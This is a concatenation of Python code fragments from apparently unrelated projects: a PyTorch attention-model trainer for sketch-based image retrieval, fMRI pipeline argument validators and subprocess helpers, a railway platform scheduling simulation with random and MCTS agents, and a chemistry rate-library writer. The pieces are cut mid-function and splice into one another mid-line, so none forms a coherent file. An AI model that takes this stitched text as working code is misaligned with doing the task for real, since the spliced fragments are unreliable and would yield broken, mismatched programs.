# print('classifer_weight_grad', self.model.classifier.fc.weight.grad)
# print('classifer_bias_grad', self.model.classifier.fc.bias.grad)
# print('sensor_weight1_grad', self.model.sensor.fc1.weight.grad)
# print('sensor_bias1_grad', self.model.sensor.fc1.bias.grad)
# print('rnn_i2h_grad', self.model.rnn.i2h.weight.grad)
# print('rnn_h2h_grad', self.model.rnn.h2h.weight.grad)
self.optimizer.step()
# measure elapsed time
toc = time.time()
batch_time.update(toc - tic)
pbar.set_description(
(
"{:.1f}s - loss: {:.3f} - reward: {:.3f}-action loss: {:.3f}-location loss: {:.3f}".format(
(toc - tic), losses.avg, reward.avg, losses_action.avg, losses_reinforce.avg
)
)
)
pbar.update(self.batch_size*17)
# dump the glimpses and locs
if plot:
# imgs = [g.cpu().data.numpy().squeeze(1) for g in imgs]
# locs = torch.stack(locs).transpose(1,0)
# locs = [l.cpu().data.numpy() for l in locs]
imgs = torch.cat(imgs).cpu().data.numpy().squeeze(1)
locs = []
for loc_index in range(12):
locs.append(torch.cat([locs_list[0][loc_index], locs_list[1][loc_index]]))
# imgs = [g.cpu().data.numpy().squeeze() for g in imgs]
# locs = [l.cpu().data.numpy() for l in locs_list[0]]
assert len(locs) == self.num_glimpses
pickle.dump(
imgs, open(self.plot_dir + "g_{}.p".format(epoch + 1), "wb")
)
pickle.dump(
locs, open(self.plot_dir + "l_{}.p".format(epoch + 1), "wb")
)
# log to tensorboard
# if self.use_tensorboard:
# iteration = epoch * len(self.train_loader) + i
# log_value("train_loss", losses.avg, iteration)
# log_value("train_reward", reward.avg, iteration)
# log_value("train_acc", accs.avg, iteration)
# log_value("train_loss_action", losses_action.avg, iteration)
# log_value("train_loss_reinforce", losses_reinforce.avg, iteration)
# log_value("train_loss_baseline", losses_baseline.avg, iteration)
# log_value("action_log_probablity", ac_p,iteration)
# log_value("location_log_probablity", p, iteration)
# log_value("h_t_norm", torch.norm(h_t), iteration)
return losses.avg, reward.avg, losses_action.avg, losses_reinforce.avg
@torch.no_grad()
def validate1(self, epoch):
"""Evaluate the RAM model on the validation set.
"""
# losses = AverageMeter()
# accs = AverageMeter()
self.model.eval()
# num_of_Sketch_Step = len(self.Sketch_Array_Valid[0])
avererage_area = []
rank_all = torch.zeros(len(self.Sketch_Array_Valid))
Image_Array_Valid = []
previous_query = ""
for i, sampled_batch in enumerate(self.valid_loader):
# x, y = x.to(self.device), y.to(self.device)
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
if (previous_query != position_query):
previous_query = position_query
target = self.Image_Array_Test[position_query].unsqueeze(0)
Image_Array_Valid.append(target)
Image_Array_Valid = torch.cat(Image_Array_Valid)
for i, sampled_batch in enumerate(self.valid_loader):
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
x = sampled_batch['sketch_img'][-1].to(self.device)
# duplicate M times
# x = x.repeat(self.M, 1, 1, 1)
# initialize location vector and hidden state
self.batch_size = x.shape[0]
h_t, l_t = self.reset()
# h_t = torch.tensor(self.Sketch_Array_Valid[i][-1], dtype=torch.float,device=self.device,requires_grad=True ).unsqueeze(0)
# h_t = self.Sketch_Array_Train[i][-1].clone().detach().float().unsqueeze(0).to(self.device).requires_grad_(True)
# extract the glimpses
# log_pi = []
# baselines = []
for t in range(self.num_glimpses - 1):
# forward pass through model
h_t, l_t, b_t, p, entropy = self.model(x, l_t, h_t, epoch, t, True)
# last iteration
h_t, l_t, b_t, action, a_p, p, entropy = self.model(x, l_t, h_t, epoch, t, True, last=True)
# action, _ = self.model(h_t, last=True)
target_distance = F.pairwise_distance(action,
self.Image_Array_Test[position_query].unsqueeze(0))
distance = F.pairwise_distance(action, Image_Array_Valid)
rank_all[i] = distance.le(target_distance).sum()
if rank_all[i].item() == 0:
avererage_area.append(1.)
else:
avererage_area.append(1. / rank_all[i].item())
top5_accuracy = rank_all.le(5).sum().numpy() / rank_all.shape[0]
meanIOU = np.mean(avererage_area)
# log to tensorboard
if self.use_tensorboard:
iteration = epoch * len(self.valid_loader) + i
log_value("valid_avg_reward", meanIOU, iteration)
log_value("valid_top5_acc", top5_accuracy, iteration)
return meanIOU, top5_accuracy
@torch.no_grad()
def validate(self, epoch):
"""Evaluate the RAM model on the validation set.
"""
# num_of_Sketch_Step = len(self.Sketch_Array_Valid[0])
self.model.eval()
avererage_area = []
average_rp = []
rank_all = torch.zeros(len(self.Sketch_Array_Valid), 17)
Image_Array_Valid = []
previous_query = ""
for i, sampled_batch in enumerate(self.valid_loader):
# x, y = x.to(self.device), y.to(self.device)
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
if (previous_query != position_query):
previous_query = position_query
target = self.Image_Array_Test[position_query].unsqueeze(0)
Image_Array_Valid.append(target)
Image_Array_Valid = torch.cat(Image_Array_Valid)
for i, sampled_batch in enumerate(self.valid_loader):
sketch_name = self.Sketch_Name_Valid[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
for j, sampled_sketch in enumerate(sampled_batch['sketch_img']):
x = sampled_sketch.to(self.device)
# initialize location vector and hidden state
self.batch_size = x.shape[0]
h_t, l_t = self.reset()
# extract the glimpses
for t in range(self.num_glimpses - 1):
# forward pass through model
h_t, l_t, b_t, p, entropy = self.model(x, l_t, h_t, epoch, t, True)
# last iteration
h_t, l_t, b_t, action, p, entropy = self.model(x, l_t, h_t, epoch, t, True, last=True)
# action = 0.1*action + 0.9*standard
target_distance = F.pairwise_distance(action,
self.Image_Array_Test[position_query].unsqueeze(0))
distance = F.pairwise_distance(action, Image_Array_Valid)
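# Note: the rank below counts how many gallery images are at least as close to the
# sketch embedding as the true target (the target itself included), so 1 is the best
# possible value.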
rank_all[i, j] = distance.le(target_distance).sum()
rank_percentile = ((len((distance == target_distance).nonzero(as_tuple=True)) // 2) + len(self.Image_Name_Test) - rank_all[i,j]) / len(self.Image_Name_Test)
average_rp.append(rank_percentile)
if rank_all[i, j].item() == 0:
avererage_area.append(1.)
else:
avererage_area.append((1. / rank_all[i, j].item()))
top5_accuracy = rank_all[:,-1].le(5).sum().numpy() / rank_all.shape[0]
top10_accuracy = rank_all[:,-1].le(10).sum().numpy() / rank_all.shape[0]
meanIOU = np.mean(avererage_area)
rp = np.mean(average_rp)
# log to tensorboard
# if self.use_tensorboard:
# iteration = epoch * len(self.valid_loader) + i
# log_value("valid_avg_reward", meanIOU, iteration)
# log_value("valid_top5_acc", top5_accuracy, iteration)
self.model.train()
return meanIOU, top5_accuracy, top10_accuracy, rp
@torch.no_grad()
def test1(self):
"""Test the RAM model.
This function should only be called at the very
end once the model has finished training.
"""
# load the best checkpoint
self.load_checkpoint(best=self.best)
# self.Sketch_Array_Test = self.Sketch_Array_Test[100:]
# self.Sketch_Name_Test = self.Sketch_Name_Test[100:]
self.model.eval()
avererage_area = []
average_rp = []
rank_all = torch.zeros(len(self.Sketch_Array_Test), 17)
rank_inverse = torch.zeros(len(self.Sketch_Array_Test), 17)
rank_rp = torch.zeros(len(self.Sketch_Array_Test), 17)
imgs = []
locs_list = []
# Image_Array_Valid = []
# previous_query = ""
#
# for i, sampled_batch in enumerate(self.valid_loader):
# # x, y = x.to(self.device), y.to(self.device)
#
# sketch_name = self.Sketch_Name_Valid[i]
# assert sketch_name == sampled_batch["sketch_path"][0]
# sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
# position_query = self.Image_Name_Test.index(sketch_query_name)
# if (previous_query != position_query):
# previous_query = position_query
# target = self.Image_Array_Test[position_query].unsqueeze(0)
# Image_Array_Valid.append(target)
# Image_Array_Valid = torch.cat(Image_Array_Valid)
for i, sampled_batch in enumerate(self.test_loader):
sketch_name = self.Sketch_Name_Test[i]
assert sketch_name == sampled_batch["sketch_path"][0]
sketch_query_name = '_'.join(sketch_name.split('/')[-1].split('_')[:-1])
position_query = self.Image_Name_Test.index(sketch_query_name)
if i % 5 == 0:
imgs = []
locs_list = []
for j, sampled_sketch in enumerate(sampled_batch['sketch_img']):
x = sampled_sketch.to(self.device)
# initialize location vector and hidden state
self.batch_size = x.shape[0]
h_t, l_t = self.reset()
if j==8 or j==16:
imgs.append(x)
# h_t = torch.tensor(self.Sketch_Array_Valid[i][-1],dtype=torch.float,device=self.device,requires_grad=True ).unsqueeze(0)
# h_t
multiple times in parallel
:param scriptname: String describing the script being run in parallel
:param processes: List of multiprocessing.Process objects ready to run
:param sleep: Integer, how many seconds to wait between (a) process
submissions and (b) checking if all processes finished
:param show: True to show the user what's running at sleep-second intervals;
otherwise False
"""
started = datetime.now()
submitted = list()
failed = False
for each_process in processes:
submitted.append(each_process.start())
time.sleep(sleep)
while any((p.exitcode is None) for p in processes):
time.sleep(sleep)
if show:
get_and_print_time_since(scriptname + ' started', started)
if not all(p.exitcode is None or p.exitcode == 0 for p in processes):
failed = True
for p in processes:
p.terminate()
if failed:
sys.exit('Error: {} subprocess failed.'.format(scriptname))
def run_python_subscript(path_to_subscript, run, to_replace, *args):
"""
Use subprocess to run a Python 3.6+ script from this code base
:param path_to_subscript: String, valid path to real Python 3.6+ script
:param run: Whole number (as an int or a string) defining which run this is
:param to_replace: String to find and replace with each run name/id
:param args: Unpacked list of parameters to run subscript with
"""
start_time = datetime.now()
try:
subprocess.check_call(individualize_subprocess_run(
['python3', path_to_subscript, *args], run, to_replace
))
except subprocess.CalledProcessError:
err_type, err_msg, _ = sys.exc_info() # TODO make this into a reusable function? See run_level_1_analysis.get_events_make_template
sys.exit('\n\n{}: {}\n\n'.format(err_type.__name__, err_msg))
get_and_print_time_since(os.path.basename(path_to_subscript)
+ ' started', start_time)
return # Explicitly end this function so multiprocessing knows it's done
def save_to_json_and_get_path(a_dict, dict_name, out_dir):
"""
:param a_dict: Dictionary with only string keys
:param dict_name: String naming a_dict
:param out_dir: String, a valid path to a real directory to save
the .json file containing a_dict into
:return: String, the full path to the .json file containing a_dict
"""
json_path = os.path.join(out_dir, 'abcd-bids-pipeline-{}_{}.json'.format(
dict_name, datetime.now().strftime('%Y-%b-%d_%H-%M')
))
with open(json_path, 'w+') as json_file:
json_file.write(json.dumps(a_dict))
return json_path
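# Example (illustrative): save_to_json_and_get_path({'task': 'MID'}, 'args', '/out')
# would write and return a path like '/out/abcd-bids-pipeline-args_2024-Jan-01_12-00.json'.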
def valid_float_0_to_1(val):
"""
:param val: Object to check, then throw an error if it is invalid
:return: val if it is a float between 0 and 1 (otherwise invalid)
"""
return validate(val, lambda x: 0 <= float(x) <= 1, float,
'Value must be a number between 0 and 1')
def valid_output_dir(path):
"""
Try to make a folder for new files at path; throw exception if that fails
:param path: String which is a valid (not necessarily real) folder path
:return: String which is a validated absolute path to real writeable folder
"""
return validate(path, lambda x: os.access(x, os.W_OK),
valid_readable_dir, 'Cannot create directory at {}',
lambda y: os.makedirs(y, exist_ok=True))
def valid_readable_dir(path):
"""
:param path: Parameter to check if it represents a valid directory path
:return: String representing a valid directory path
"""
return validate(path, os.path.isdir, valid_readable_file,
'Cannot read directory at {}')
def valid_readable_file(path):
"""
Throw exception unless parameter is a valid readable filepath string. Use
this, not argparse.FileType('r') which leaves an open file handle.
:param path: Parameter to check if it represents a valid filepath
:return: String representing a valid filepath
"""
return validate(path, lambda x: os.access(x, os.R_OK),
os.path.abspath, 'Cannot read file at {}')
def valid_readable_json(path):
"""
:param path: Parameter to check if it represents a valid .json file path
:return: String representing a valid .json file path
"""
return validate(path, lambda x: os.path.splitext(path)[-1] == '.json',
valid_readable_file, '{} is not a readable .json filepath')
def valid_subj_ses(in_arg, prefix, name): #, *keywords):
"""
:param in_arg: Object to check if it is a valid subject ID or session name
:param prefix: String, 'sub-' or 'ses-'
:param name: String describing what in_arg should be (e.g. 'subject')
:return: True if in_arg is a valid subject ID or session name; else False
"""
return validate(in_arg, lambda _: True, # lambda x: any([key in x for key in [prefix, *keywords]]),
lambda y: (y if y[:len(prefix)] == prefix else prefix + y),
'{}' + ' is not a valid {}'.format(name))
def valid_template_filename(fname):
"""
:param fname: Parameter to check if it represents a .fsf file name
:return: String representing the .fsf file name
"""
return validate(fname, lambda x: os.path.splitext(x)[-1] == '.fsf',
lambda y: y, '{} is not an .fsf file name')
def valid_time_str(in_arg):
"""
:param in_arg: Object to check if it's a time string in the HH:MM:SS format
:return: True if in_arg is a time limit string in that format; else False
"""
try:
split = in_arg.split(":")
assert len(split) == 3
for each_num in split:
assert each_num.isdigit()
assert int(each_num) >= 0
return in_arg
except (TypeError, AssertionError, ValueError):
raise argparse.ArgumentTypeError('Invalid time string.')
def valid_whole_number(to_validate):
"""
Throw argparse exception unless to_validate is a non-negative integer
:param to_validate: Object to test whether it is a non-negative integer
:return: to_validate if it is a non-negative integer
"""
return validate(to_validate, lambda x: int(x) >= 0, int,
'{} is not a non-negative integer')
def validate(to_validate, is_real, make_valid, err_msg, prepare=None):
"""
Parent/base function used by different type validation functions. Raises an
argparse.ArgumentTypeError if the input object is somehow invalid.
:param to_validate: String to check if it represents a valid object
:param is_real: Function which returns true iff to_validate is real
:param make_valid: Function which returns a fully validated object
:param err_msg: String to show to user to tell them what is invalid
:param prepare: Function to run before validation
:return: to_validate, but fully validated
"""
try:
if prepare:
prepare(to_validate)
assert is_real(to_validate)
return make_valid(to_validate)
except (OSError, TypeError, AssertionError, ValueError,
argparse.ArgumentTypeError):
raise argparse.ArgumentTypeError(err_msg.format(to_validate))
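# Example (illustrative) of how validate() composes the pieces above: is_real guards the
# check, make_valid performs the conversion, and any failure is re-raised as an
# argparse.ArgumentTypeError carrying err_msg.
#   validate('0.5', lambda x: 0 <= float(x) <= 1, float,
#            'Value must be a number between 0 and 1')   # -> 0.5
#   validate('1.5', lambda x: 0 <= float(x) <= 1, float,
#            'Value must be a number between 0 and 1')   # raises argparse.ArgumentTypeError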
def validate_cli_args(cli_args, parser, arg_names=set()):
"""
Validate types and set defaults for any arg whose validation depends on
another arg and therefore was not possible in get_pipeline_cli_argparser
:param cli_args: Dictionary containing all command-line arguments from user
:param parser: argparse.ArgumentParser to raise error if anything's invalid
:param arg_names: Set containing SCAN_ARG if that argument is needed
:return: cli_args, but fully validated
"""
# Default levels, template file directory, and scanner info file path
cli_args = ensure_dict_has(cli_args, 'levels', [1, 2]
if len(cli_args['runs']) > 1 else [1])
cli_args = ensure_dict_has(cli_args, 'templates',
os.path.join(SCRIPT_DIR, 'templates'))
if SCAN_ARG in arg_names:
cli_args = ensure_dict_has(cli_args, SCAN_ARG, os.path.join(
SCRIPT_DIR, 'scan_info', SCAN_ARG + '.csv'
))
for lvl in cli_args['levels']: # Default template file names
cli_args = ensure_dict_has(cli_args, 'template{}'.format(lvl), (
'template_DCAN_version_{}_level{}_UPDATED_FINAL.fsf'
.format(cli_args['task'], lvl)
))
validate_template_file(cli_args, lvl, parser)
# Default paths to FSL and wb_command
ERR_MSG = 'No {} found. Please include the {} argument.'
if not (dict_has(cli_args, 'wb_command') and
os.access(cli_args['wb_command'], os.X_OK)):
parser.error(ERR_MSG.format('wb_command executable', '--wb-command'))
if not dict_has(cli_args, 'fsl_dir'):
fsl = get_default_ext_command('fsl')
cli_args['fsl_dir'] = os.path.dirname(fsl) if fsl else parser.error(
ERR_MSG.format('FSL directory', '--fsl-dir')
)
# Default output/temp/event files directories. Avoiding ensure_dict_has to
if not dict_has(cli_args, 'output'): # prevent permissions error from
cli_args['output'] = valid_output_dir( # valid_output_dir making dirs.
os.path.join(cli_args['study_dir'], 'derivatives', 'abcd-bids-tfm'
'ri-pipeline', cli_args['subject'], cli_args['ses'])
)
for arg in ('temp_dir', 'events_dir'):
if not dict_has(cli_args, arg):
cli_args[arg] = valid_output_dir(
os.path.join(cli_args['output'], 'level-1', arg.split('_')[0])
)
return cli_args
def validate_template_file(cli_args, lvl, parser):
"""
Verify that template .fsf file exists
:param cli_args: Dictionary containing all command-line arguments from user
:param lvl: String or int defining the analysis level, 1 or 2 or "1" or "2"
:param parser: argparse.ArgumentParser to raise error if anything's invalid
"""
tmpl = 'template{}'.format(lvl)
tmpl_fpath = os.path.join(cli_args['templates'], cli_args[tmpl])
if not os.path.exists(tmpl_fpath):
parser.error('{} does not exist. Please re-run with a different --{} '
'or --templates argument.'.format(tmpl_fpath, tmpl))
def wb_command(cli_args, *args):
"""
Call wb_command executable with any given parameters
:param cli_args: Dictionary mapping 'wb_command' key to wb_command filepath
:param args: List of all parameters to call wb_command with, in order
"""
subprocess.check_call([cli_args['wb_command'], *args])
def wb_command_get_info(wb_command, dtseries, arg_only):
"""
Call wb_command with -file-information and -no-map-info parameters
:param wb_command: String, path to existing workbench wb_command executable
:param dtseries: String, the path to a .dtseries.nii file with file info
:param arg_only: String, the last part of the name of a wb_command
argument starting with '-only-'
:return: String representing a numerical value describing the dtseries
"""
return os.popen('{} -file-information {} -no-map-info -only-{}'
.format(wb_command, dtseries, arg_only)).read().rstrip()
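# Example (illustrative; both the file name and the '-only-' suffix come from the
# caller): wb_command_get_info(wb, 'sub-01_task-rest_bold.dtseries.nii', 'number-of-maps')
# runs a shell line like
#   wb_command -file-information sub-01_task-rest_bold.dtseries.nii -no-map-info -only-number-of-maps
# and returns its stdout with the trailing newline stripped.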
def wb_LR_pair(func_LR, arg_LR=None, after=True):
"""
Get wb_command left- and right- arguments
:param func_LR: Function which accepts 'L' or 'R' and returns a filepath
:param arg_LR: String naming the left- or right- argument
:param after:
import networkx as nx
from datetime import datetime, time, timedelta
import matplotlib.pyplot as plt
import heapq
import random
import dill
colors = {"arr": "green", "pf": "gray", "mid": "blue", "dep": "red"}
time_format = "%H:%M:%S"
date_format = "%d:%m:%Y"
cb_dummy = 1000
cb_regular = 1
headway = 0
tmax = 1440
gd = {}
n_pfs = 3
n_dir = 2
n_mid = 5
n_prty = 3
# seed = 42
# random.seed(seed)
# In_paths with their ids : [Path]
arr_paths = {}
# Out Paths with their ids : [Path]
dep_paths = {}
# pf id
pf_id = {}
# in Paths from a given direction (dir : [in_path ids])
in_paths_from = {}
# out Paths from a given platform to a given direction (pf,dir: [out paths ids])
out_paths_from = {}
# Path Incompatibility Graph (PIG): nodes are in/out paths, edges connect conflicting paths
PIG = nx.Graph()
PIG_labels = dict()
def check_incompat(p1, p2):
for d in p1:
if d[0] == "D":
continue
if d in p2:
return True
return False
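# Example (illustrative): two routes conflict when they share any node other than a
# direction node (names starting with 'D').
#   check_incompat(['D1', 'a', 'b', 'P1'], ['D2', 'b', 'P2'])  # -> True (both use 'b')
#   check_incompat(['D1', 'a', 'P1'], ['D1', 'c', 'P2'])       # -> False (only the direction is shared)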
def get_available(paths):
avlbl = []
for idx, path in enumerate(paths):
if not path:
avlbl.append(idx)
return avlbl
def create_PIG_nodes():
for in_dir, in_paths in in_paths_from.items():
for in_path_id in in_paths:
# print(f"in_path_id - {in_path_id} : {arr_paths[in_path_id][-1]}")
pf = arr_paths[in_path_id][-1]
PIG.add_node(f"{in_dir}-{in_path_id}", path_type=0,
data=arr_paths[in_path_id], idx=in_path_id, pf=pf)
PIG_labels[f"{in_dir}-{in_path_id}"] = arr_paths[in_path_id]
for pf, out_dir_dict in out_paths_from.items():
for out_dir, out_paths in out_dir_dict.items():
for out_path_id in out_paths:
pf = dep_paths[out_path_id][0]
PIG.add_node(f"{out_dir}-{out_path_id}",
path_type=1, data=dep_paths[out_path_id], idx=out_path_id, pf=pf)
PIG_labels[f"{out_dir}-{out_path_id}"] = dep_paths[out_path_id]
def create_PIG_edges():
# in_path_edges
labels = {
0: "in-in",
1: "in-out",
2: "out-out"
}
for idx, n1 in enumerate(list(PIG.nodes)[:-1]):
for idx2, n2 in enumerate(list(PIG.nodes)[idx+1:]):
node1 = PIG.nodes[n1]
node2 = PIG.nodes[n2]
if check_incompat(node1["data"], node2["data"]):
edge_type = node1["path_type"] + node2["path_type"]
PIG.add_edge(n1, n2, edge_type=labels[edge_type])
# PIG_labels[f"{n1}-{n2}"] = labels[edge_type]
def get_in_paths_from(arr_paths):
for idx, path in enumerate(arr_paths):
if path[0] not in in_paths_from.keys():
in_paths_from[path[0]] = []
in_paths_from[path[0]].append(idx)
def get_out_paths_from(dep_paths):
for idx, path in enumerate(dep_paths):
if path[0] not in out_paths_from.keys():
out_paths_from[path[0]] = {}
if path[-1] not in out_paths_from[path[0]].keys():
out_paths_from[path[0]][path[-1]] = []
out_paths_from[path[0]][path[-1]].append(idx)
def get_pf_ids(pf):
for idx, p in enumerate(pf):
pf_id[p[0]] = idx
def one_hot(data, n):
val = [1 if i in data else 0 for i in range(n)]
return val
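# Example (illustrative): one_hot([1, 3], 5) -> [0, 1, 0, 1, 0]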
class PriorityQueue:
def __init__(self):
self.q = []
def __len__(self):
return len(self.q)
def __iter__(self):
for i, _ in enumerate(self.q):
yield self.q[i]
def hsort(self):
heapq.heapify(self.q)
def push(self, data):
heapq.heappush(self.q, data)
def pop(self):
return heapq.heappop(self.q)
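# Note: PriorityQueue is a thin heapq wrapper, so queued items are ordered by their own
# __lt__ -- Msg objects sort by release time and Train objects by arrival time, then
# priority (see below).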
class Msg:
def __init__(self, res, rel_time, nbr_node):
'''
Message to be stored in the environment to release locked path in the future
res : (in_path id, out_path id, pf id, stoppage time)
rel_time : time at which to release the resource
nbr_node : 1 if resource is only single path else 0
'''
self.res = res
self.rel_time = rel_time
self.nbr_node = nbr_node
def __lt__(self, other):
if self.rel_time < other.rel_time:
return True
else:
return False
def write_schedule(sol):
file = open('CNB_sched.txt', 'w')
for line in sol:
tname, pf, arr_path, dep_path, arr_t, dep_t, shift, _ = line
ans = f'{tname},{pf},{"-".join(arr_path)},{"-".join(dep_path)},{arr_t},{dep_t},{shift}\n'
file.writelines(ans)
file.close()
def read_edges(fname):
edges = []
file = open(fname, 'r')
for line in file.readlines():
line = line.rstrip().split(', ')
x1 = line[0][1:]
x2 = line[1][:-2]
# print([x1, x2])
edges.append(tuple([x1, x2]))
return edges
def read_layout(fname):
glayout = {}
file = open(fname, 'r')
for line in file.readlines():
line = line.rstrip().split()
node = line[0]
x = int(line[1])
y = int(line[2])
glayout[node] = [x, y]
return glayout
def read_trains(fname):
'''
data is a dict having
name : name of Train
in_dir : incoming direction (0 ... n_dirs)
out_dir : outgoing direction (0 ... n_dirs)
arr_t : arrival time (0 .. 1440)
stop : stoppage time
pref_pf : list of preferred platforms
prty : priority (1 .. 4) higher has more priority
'''
train_info_set = []
file = open(fname, 'r')
for line in file.readlines():
line = line.rstrip().split()
name = line[0]
curr_date = datetime.strptime(line[1], date_format)
in_dir = line[2]
out_dir = line[3]
arr_t = int(line[4])
stop = int(line[5])
pref_pf = line[6].split('-')
prty = line[7]
data = {
"name": name,
"in_dir": in_dir,
"out_dir": out_dir,
"arr_t": arr_t,
"stop": stop,
"pref_pf": pref_pf,
"prty": prty
}
train_info_set.append(Train(data))
return train_info_set
def create_station():
station = nx.Graph()
directs = [
(f"D{i}", {"ntype": "arr", "name": f"D{i}"}) for i in range(1, n_dir+1)
]
platforms = [
(f"P{i}", {"ntype": "pf", "name": f"P{i}"}) for i in range(1, n_pfs+1)
]
mid_nodes = [
(f"{chr(97 + i)}", {"ntype": "mid", "name": f"{chr(97 + i)}"})
for i in range(n_mid)
]
# station.add_nodes_from(arr_directs)
station.add_nodes_from(platforms)
station.add_nodes_from(mid_nodes)
station.add_nodes_from(directs)
# station.add_nodes_from(dep_directs)
edge_list = read_edges('test_station.txt')
station.add_edges_from(edge_list)
arr_paths = read_arr_paths()
dep_paths = read_dep_paths()
glayout = read_layout('test_layout.txt')
# for v, data in station.nodes.data():
# print(v, data)
# print(station.nodes.data())
# show_station(station, glayout)
return station, directs, platforms, mid_nodes, arr_paths, dep_paths
def show_station(G, glayout):
"""Function shows graph in matplotlib
G: Graph
glayout: The coordinates of the nodes in the graph to show
"""
# print(G.nodes.data())
color = [colors[data["ntype"]] for v, data in G.nodes.data()]
# for node, data in G.nodes.data():
# print(node, data)
label_dict = {node: data["name"] for node, data in G.nodes.data()}
# pos = nx.multipartite_layout(G, subset_key="layer")
# print(pos)
plt.figure(figsize=(8, 8))
nx.draw(G, glayout, node_color=color, with_labels=True, labels=label_dict)
plt.axis("equal")
plt.show()
def read_arr_paths():
arr_paths = []
# dep_paths = []
dir_names = [f"D{i}" for i in range(1, n_dir+1)]
for name in dir_names:
file = open(f'arr_paths/test_arr_{name}.txt', 'r')
for line in file.readlines():
line = line.rstrip().split()
arr_paths.append(line)
return arr_paths
def read_dep_paths():
dep_paths = []
# dep_paths = []
dir_names = [f"D{i}" for i in range(1, n_dir+1)]
for name in dir_names:
file = open(f'dep_paths/test_dep_{name}.txt', 'r')
for line in file.readlines():
line = line.rstrip().split()
dep_paths.append(line)
return dep_paths
def save_agent(agent, fname):
dill.dump(agent, file=open(f'./saved_agents/{fname}.pickle', 'wb'))
def load_agent(fname):
with open(f"./saved_agents/{fname}.pickle", "rb") as file:
agent = dill.load(file)
return agent
class Train:
def __init__(self, data):
'''
data is a dict having
name : name of Train
in_dir : incoming direction (0 ... n_dirs)
out_dir : outgoing direction (0 ... n_dirs)
arr_t : arrival time (0 .. 1440)
stop : stoppage time
pref_pf : list of preferred platforms
prty : priority (1 .. 4) higher has more priority
'''
self.data = dict()
for key, value in data.items():
self.data[key] = value
self.reward = 0
# self.in_dir = one_hot([self.data["in_dir"]], n_dir)
# self.out_dir = one_hot(self.data["out_dir"], n_dir)
# self.pfs = one_hot(self.data["pref_pf"], n_pfs)
# self.prty = one_hot([self.data["prty"]], n_prty)
def __str__(self):
name = f'Train Name: {self.data["name"]}\n'
in_dir = f'In Direction: {self.data["in_dir"]}\n'
out_dir = f'Out Direction: {self.data["out_dir"]}\n'
arr_t = f'Arrival Time: {self.data["arr_t"]}\n'
stop = f'Stoppage: {self.data["stop"]}\n'
pref_pfs = f'Pref Pfs: {self.data["pref_pf"]}\n'
prty = f'Priority: {self.data["prty"]}\n'
return name + arr_t + prty
def __lt__(self, other):
if self.data["arr_t"] < other.data["arr_t"]:
return True
elif self.data["arr_t"] == other.data["arr_t"]:
if self.data["prty"] > other.data["prty"]:
return True
else:
return False
else:
return False
def get_dep_time(self):
return self.data["arr_t"] + self.data["stop"]
def delay(self):
self.data["arr_t"] = (self.data["arr_t"] + 1) % tmax
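# Example (illustrative) of the ordering defined by Train.__lt__ above: with equal
# arrival times the higher-priority train sorts first, so it is popped from a
# PriorityQueue before the other.
#   t1 = Train({"name": "A", "in_dir": "D1", "out_dir": "D2", "arr_t": 30, "stop": 2, "pref_pf": ["P1"], "prty": 3})
#   t2 = Train({"name": "B", "in_dir": "D2", "out_dir": "D1", "arr_t": 30, "stop": 2, "pref_pf": ["P2"], "prty": 1})
#   assert t1 < t2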
class Agent:
def __init__(self):
pass
def act(self, train, data, tq):
'''
Get an action from an Agent
action : (train,in_path,out_path,pf,delay)
'''
in_dir = train.data["in_dir"]
out_dir = train.data["out_dir"]
# get in_paths
possible_in_paths = []
for path_id in in_paths_from[in_dir]:
if not data[0][path_id]:
possible_in_paths.append(path_id)
if not len(possible_in_paths):
return (train, -1, -1, -1, 1)
in_path = self.choose_in_path(possible_in_paths)
pf = arr_paths[in_path][-1]
possible_out_paths = []
for path_id in out_paths_from[pf][out_dir]:
if not data[1][path_id]:
possible_out_paths.append(path_id)
if not len(possible_out_paths):
return (train, -1, -1, -1, 1)
out_path = self.choose_out_path(possible_out_paths)
return (train, in_path, out_path, pf, 0)
def choose_in_path(self, in_paths):
'''
returns the id of the chosen in_path
'''
return random.choice(in_paths)
def choose_out_path(self, out_paths):
'''
returns the id of the chosen out_path
'''
return random.choice(out_paths)
def get_reward(self, reward):
pass
class Agent_MCTS:
def __init__(self, t_list, in_state, out_state):
self.n_train = 0 # no. of episodes trained
self.q_table = dict()
for t in t_list:
self.q_table[t.data["name"]] = {
"in_path_val": [0 for i in range(len(in_state))],
"out_path_val": [0 for i in range(len(out_state))],
"in_path_count": [0 for i in range(len(in_state))],
"out_path_count": [0 for i in range(len(out_state))]}
def act(self, train, data, tq):
'''
Get an action from an Agent
action : (train,in_path,out_path,pf,delay)
'''
in_dir = train.data["in_dir"]
out_dir = train.data["out_dir"]
# get in_paths
possible_in_paths = []
for path_id in in_paths_from[in_dir]:
if not data[0][path_id]: # if in_path_id is not locked
possible_in_paths.append(path_id)
if not len(possible_in_paths): # if there are no possible in_paths no choice but delay
return (train, -1, -1, -1, 1)
# choose the in_path
in_path = self.choose_in_path(possible_in_paths)
# get platform from chosen in_path
pf = arr_paths[in_path][-1]
possible_out_paths = []
for path_id in out_paths_from[pf][out_dir]:
if not data[1][path_id]: # if out_path_id is not locked
possible_out_paths.append(path_id)
if not len(possible_out_paths):
return (train, -1, -1, -1, 1)
out_path
x: x.index)
flib = open(os.path.join(path, 'rateLibrary.txt'), 'w')
flib.write('// The format for the data in this rate library\n')
flib.write('Arrhenius_EP\n\n')
fcom = codecs.open(os.path.join(path, 'comments.rst'), 'w', 'utf-8')
fcom.write('-------\n')
fcom.write('General\n')
fcom.write('-------\n')
fcom.write(self.longDesc.strip() + '\n\n')
for entry in entries:
flib.write('{0:<5d} '.format(entry.index))
for label in entry.label.split(';'):
flib.write('{0:<23} '.format(label))
if entry.data.Tmax is None:
Trange = '{0:g} '.format(entry.data.Tmin.value)
else:
